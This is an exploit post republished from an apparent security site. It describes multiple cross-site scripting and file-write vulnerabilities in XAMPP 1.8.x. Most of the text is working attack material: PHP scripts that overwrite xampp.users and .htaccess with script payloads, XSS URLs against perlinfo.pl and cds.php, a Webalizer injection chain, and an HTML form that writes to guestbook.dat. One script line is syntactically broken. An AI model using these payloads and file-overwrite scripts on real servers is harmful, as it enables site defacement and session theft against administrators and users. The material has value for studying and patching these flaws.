首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
XAMPP 1.8.x Multiple Vulnerabilities
来源:vfocus.net 作者:DevilScreaM 发布时间:2014-10-08  
#Exploit Name : XAMPP 1.8.x Multiple Vulnerabilities
#Author : DevilScreaM
#Date : 6 October 2014
#Vendor : http://bitnami.com
#Version : 1.8.x or Higher Version
#Operating System : Windows / Linux
#Vulnerability : Cross Site Scripting / Write File
#Type : #WebApps #Application
#Tested : Windows 7 64 Bit
#Thanks : Newbie-Security, Indonesian Hacker Team, Indonesia Coder Team, Indonesia Security Team
  
  
Cross Site Scripting at perlinfo.pl #1
  
Perl Version : 5.16.3
  
Script For Exploit
  
For Localhost
  
<?php
$xss  = "<script>alert('Tested by DevilScreaM')</script>:";
$f =@fopen ('C:\xampp\security\xampp.users','w');
fwrite($f , $xss);
  
$htcs  = 'AuthName "Username = your Script XSS"
AuthType Basic
AuthUserFile "C:\xampp\security\xampp.users"
require valid-user';
$f1 =@fopen ('C:\xampp\htdocs\xampp\.htaccess','w');
fwrite($f1 , $htcs);
?>
  
<script>
</script>
  
  
==================================================================
  
For Site
  
<?php
$xss  = "<script>alert('Tested by DevilScreaM')</script>:";
$f =@fopen ('my.users','w');
fwrite($f , $xss);
  
$htcs  = 'AuthName "Username = your Script XSS"
AuthType Basic
AuthUserFile "my.users"
require valid-user';
$f1 =@fopen ('.htaccess','w');
fwrite($f1 , $htcs);
  
$pl = '#!"perl\bin\perl.exe"
  
use HTML::Perlinfo;
use CGI qw(header);
  
$q = new CGI;
print $q->header;
  
$p = new HTML::Perlinfo;
$p->info_general;
$p->info_variables;
$p->info_modules;
$p->info_license;';
$f2 =@fopen ('perlinfo.pl','w');
fwrite(f2 , $pl);
?>
  
<script>
window.location = "http://site.com/perlinfo.pl"
</script>
  
==================================================================
  
Save Script C:\xampp\htdocs\xss.php
  
  
Open Browser and Running http://127.0.0.1/xss.php
You Will Redirect to http://127.0.0.1/xampp/perlinfo.pl
  
Auth Login
Username : <script>alert('Tested by DevilScreaM')</script>
Password : 
  
  
===================================================================
  
Cross Site Scripting at perlinfo.pl Query String #2
  
Exploit :
  
http://127.0.0.1/xampp/perlinfo.pl?[XSS]
http://127.0.0.1/xampp/perlinfo.pl?[XSS]=[XSS]
  
Example
  
http://127.0.0.1/xampp/perlinfo.pl?<script>alert('DevilScreaM')</script>=<script>alert('Newbie-Security')</script>
  
  
====================================================================
  
Cross Site Scripting at http://127.0.0.1/xampp/perlinfo.pl #3
  
  
Exploit :
  
1. Go To Directory C:\xampp\apache\conf\
2. Edit File httpd.conf
3. Go To Line 209
  
Edit ServerAdmin postmaster@localhost to
  
ServerAdmin [YOUR XSS]
  
Example :
  
ServerAdmin <h1>DevilScreaM</h1>
  
  
4. Save File
  
5. See your XSS at
  
http://127.0.0.1/xampp/perlinfo.pl
  
  
====================================================================
  
  
  
Cross Site Scripting at http://127.0.0.1/Webalizer/
  
  
Script for Exploit :
  
  
<?php
$xss  = "<script>alert('Tested by DevilScreaM')</script>:";
$f =@fopen ('C:\xampp\security\xampp.users','w');
fwrite($f , $xss);
  
?>
  
<script>
window.location = "http://127.0.0.1/webalizer/usage_[YEARS][MONTH].html"
</script>
  
Information :
usage_[YEARS][MONTH].html => usage_201410.html
  
====================================================================
  
Save Script Webalizer.php
  
  
Command
  
@echo off
C:\xampp\webalizer\webalizer.exe -c C:\xampp\webalizer\webalizer.conf
  
PHP
  
<?php
   
$webalizer = "C:\xampp\webalizer\webalizer.bat";
          
system($webalizer);
  
?>
  
=====================================================================
  
Save Script webalizer.cmd or webalizer_run.php
  
  
Run Webalizer.cmd and Waiting Process
  
Result
  
http://127.0.0.1/webalizer/usage_[years][month].html
  
Example
  
http://127.0.0.1/webalizer/usage_201410.html
  
  
==================================================================
  
  
Cross Site Scripting at cds.php
  
Exploit :
  
http://127.0.0.1/xampp/cds.php?interpret=[XSS]
  
Example :
  
http://127.0.0.1/xampp/cds.php?interpret=<script>alert('Tested by> DevilScreaM')</script>
  
  
====================================================================
  
  
  
Write File Vulnerability
  
Script to Exploit :
  
  
<form action='http://127.0.0.1/xampp/guestbook-en.pl' method='get'>
<table border='0' cellpadding='0' cellspacing='0'>
<tr><td>TEXT:</td>
<td><input type='text' size='30' value='Tested by DevilScreaM' name='f_name'></td></tr>
<tr><td></td><td><input type='submit' value='WRITE'></td></tr>
</table></form>
</br></br>
<a href="http://127.0.0.1/xampp/guestbook.dat"><b>Result</b></a>
  
==================================================================
  
Save Script with extension .html
  
Open Script and Click Write or Change Text
  
Result
  
http://127.0.0.1/xampp/guestbook.dat

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ultra Electronics SSL VPN 7.2.
·Asx to Mp3 2.7.5 - Stack Overf
·TeamSpeak Client 3.0.14 - Buff
·ManageEngine OpManager / Socia
·Adobe Flash 14.0.0.145 copyPix
·HP Network Node Manager I PMD
·Internet Explorer 8 - Fixed Co
·Pure-FTPd External Authenticat
·Microsoft Exchange IIS HTTP In
·GNU bash 4.3.11 Environment Va
·bash代码注入的安全漏洞
·Kolibri Webserver 2.0 Buffer O
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved